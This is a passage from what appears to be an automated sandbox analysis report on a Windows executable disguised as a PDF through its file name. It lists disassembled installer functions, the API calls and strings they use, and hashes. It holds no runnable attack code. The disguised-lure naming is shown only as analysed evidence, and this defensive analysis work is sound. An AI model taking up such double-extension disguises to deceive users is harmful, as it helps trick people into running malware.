                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystemwsprintf
                    • String ID: %s%S.dll$UXTHEME$\
                    • API String ID: 2200240437-1946221925
                    • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                    • Instruction ID: 5b72af1ba0dcc73f637375af4caef66d3bb1c1b07c81d60e398b344d0bd38167
                    • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                    • Instruction Fuzzy Hash: 44F0FC70500219A6DB14AB64DD0DF9B366CAB00704F10443AA546F10D0EBB8D725CB9D
                    Function 004030BB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 530 4030bb-4030d2 531 4030d4 530->531 532 4030db-4030e4 530->532 531->532 533 4030e6 532->533 534 4030ed-4030f2 532->534 533->534 535 403102-40310f call 4032b3 534->535 536 4030f4-4030fd call 4032c9 534->536 540 4032a1 535->540 541 403115-403119 535->541 536->535 542 4032a3-4032a4 540->542 543 40324c-40324e 541->543 544 40311f-403145 GetTickCount 541->544 547 4032ac-4032b0 542->547 545 403250-403253 543->545 546 40328e-403291 543->546 548 4032a9 544->548 549 40314b-403153 544->549 545->548 552 403255 545->552 550 403293 546->550 551 403296-40329f call 4032b3 546->551 548->547 553 403155 549->553 554 403158-403166 call 4032b3 549->554 550->551 551->540 563 4032a6 551->563 556 403258-40325e 552->556 553->554 554->540 562 40316c-403175 554->562 560 403260 556->560 561 403262-403270 call 4032b3 556->561 560->561 561->540 567 403272-40327e call 405d48 561->567 565 40317b-40319b call 4065ba 562->565 563->548 572 4031a1-4031b4 GetTickCount 565->572 573 403244-403246 565->573 574 403280-40328a 567->574 575 403248-40324a 567->575 576 4031b6-4031be 572->576 577 4031ff-403201 572->577 573->542 574->556 578 40328c 574->578 575->542 579 4031c0-4031c4 576->579 580 4031c6-4031f7 MulDiv wsprintfW call 405220 576->580 581 403203-403207 577->581 582 403238-40323c 577->582 578->548 579->577 579->580 588 4031fc 580->588 585 403209-403210 call 405d48 581->585 586 40321e-403229 581->586 582->549 583 403242 582->583 583->548 591 403215-403217 585->591 587 40322c-403230 586->587 587->565 590 403236 587->590 588->577 590->548 591->575 592 403219-40321c 591->592 592->587
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CountTick$wsprintf
                    • String ID: ... %d%%
                    • API String ID: 551687249-2449383134
                    • Opcode ID: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
                    • Instruction ID: 059e374e51a41a1cd1655f51f058842c2f91e709c064eb917ef28c8af98cfe57
                    • Opcode Fuzzy Hash: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
                    • Instruction Fuzzy Hash: 61516C71901619EBCB10DF65DA44A9F7BA8AF44766F1442BFE810B62C0C7788B50CBA9
                    Function 00405CC5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 593 405cc5-405cd1 594 405cd2-405d06 GetTickCount GetTempFileNameW 593->594 595 405d15-405d17 594->595 596 405d08-405d0a 594->596 598 405d0f-405d12 595->598 596->594 597 405d0c 596->597 597->598
                    APIs
                    • GetTickCount.KERNEL32 ref: 00405CE3
                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",0040330F,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 00405CFE
                    Strings
                    • "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe", xrefs: 00405CC5
                    • nsa, xrefs: 00405CD2
                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CCA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-1095182231
                    • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                    • Instruction ID: aeb5d05e7b1985b111a0783ff917fd57ebf59e966c6a14e956644d39efae3932
                    • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                    • Instruction Fuzzy Hash: ECF09076700608BFDB109F59ED09B9BB7BDEF91710F20803BF901E7180E6B49A548B68
                    Function 00405F8E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 599 405f8e-405fc0 RegOpenKeyExW 600 406002-406005 599->600 601 405fc2-405fe1 RegQueryValueExW 599->601 602 405fe3-405fe7 601->602 603 405fef 601->603 604 405ff2-405ffc RegCloseKey 602->604 605 405fe9-405fed 602->605 603->604 604->600 605->603 605->604
                    APIs
                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406201,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405FB8
                    • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406201,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405FD9
                    • RegCloseKey.ADVAPI32(?,?,00406201,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405FFC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: : Completed
                    • API String ID: 3677997916-2954849223
                    • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                    • Instruction ID: bf4835ccadc6b91b588a17594ea5523b10c7486c9727f521a7a0ead85a7fedd2
                    • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                    • Instruction Fuzzy Hash: AF011A3215020AEADF218F66ED09EDB3BA8EF44350F01403AF945D6260D775D964DBA5
                    Function 004057A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 610 4057a1-4057d2 CreateProcessW 611 4057e0-4057e1 610->611 612 4057d4-4057dd CloseHandle 610->612 612->611
                    APIs
                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004057CA
                    • CloseHandle.KERNEL32(?), ref: 004057D7
                    Strings
                    • Error launching installer, xrefs: 004057B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID: Error launching installer
                    • API String ID: 3712363035-66219284
                    • Opcode ID: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
                    • Instruction ID: eb3bae85dc7754b4ca54a6a2ad4f1f733b6edfb5543e2d0442c61cb1db0afa2b
                    • Opcode Fuzzy Hash: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
                    • Instruction Fuzzy Hash: EEE0B6F4600209BFEB109B64ED49F7B7AACEB48645F418525BD50F2190D6B9A8148A78
                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 613 401389-40138e 614 4013fa-4013fc 613->614 615 401390-4013a0 614->615 616 4013fe 614->616 615->616 618 4013a2-4013ad call 401434 615->618 617 401400-401401 616->617 621 401404-401409 618->621 622 4013af-4013b7 call 40136d 618->622 621->617 625 4013b9-4013bb 622->625 626 4013bd-4013c2 622->626 627 4013c4-4013c9 625->627 626->627 627->614 628 4013cb-4013f4 MulDiv SendMessageW 627->628 628->614
                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
                    • Instruction ID: 1204d1a220e6d768f3d461a9159a4fc95a2ffbde449ffc0b80a50a9695adc5d2
                    • Opcode Fuzzy Hash: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
                    • Instruction Fuzzy Hash: 4E01D132624210ABE7095B389D04B6A3698E751315F10CA3BB851F66F1DA7C8C428B4C
                    Function 0040649B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(?,00000020,?,0040337A,00000009), ref: 004064AD
                    • GetProcAddress.KERNEL32(00000000,?), ref: 004064C8
                      • Part of subcall function 0040642B: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406442
                      • Part of subcall function 0040642B: wsprintfW.USER32 ref: 0040647D
                      • Part of subcall function 0040642B: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406491
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                    • String ID:
                    • API String ID: 2547128583-0
                    • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                    • Instruction ID: 5019a5ac2187e8220890e75a98e34bd06d7772fef5b84d720cc7b6e16cdc8ebf
                    • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                    • Instruction Fuzzy Hash: 6EE0863260462166D6519B745E4493772A89E99754702043EF946F3180DB789C329A6D
                    Function 00405C96 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(00000003,00402EC2,C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00405C9A
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",004035A7,?), ref: 00405CBC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                    • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                    • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                    • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                    Function 00405C71 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNELBASE(00000000,00000000,00405876,00000000,?,00000000,00405A4C,?,?,?,?), ref: 00405C76
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C8A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                    • Instruction ID: e06875fa0aeb3392bfbbe8f4052a6f2bae7b6028877eaa7173724ed83d9007bc
                    • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                    • Instruction Fuzzy Hash: 74D0C972504520AFC2102B28AE0C89BBB55EB542727024B35FAA9A22B0CB304C568A98
                    Function 0040576C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • CreateDirectoryW.KERNELBASE(?,00000000,00403304,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 00405772
                    • GetLastError.KERNEL32 ref: 00405780
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
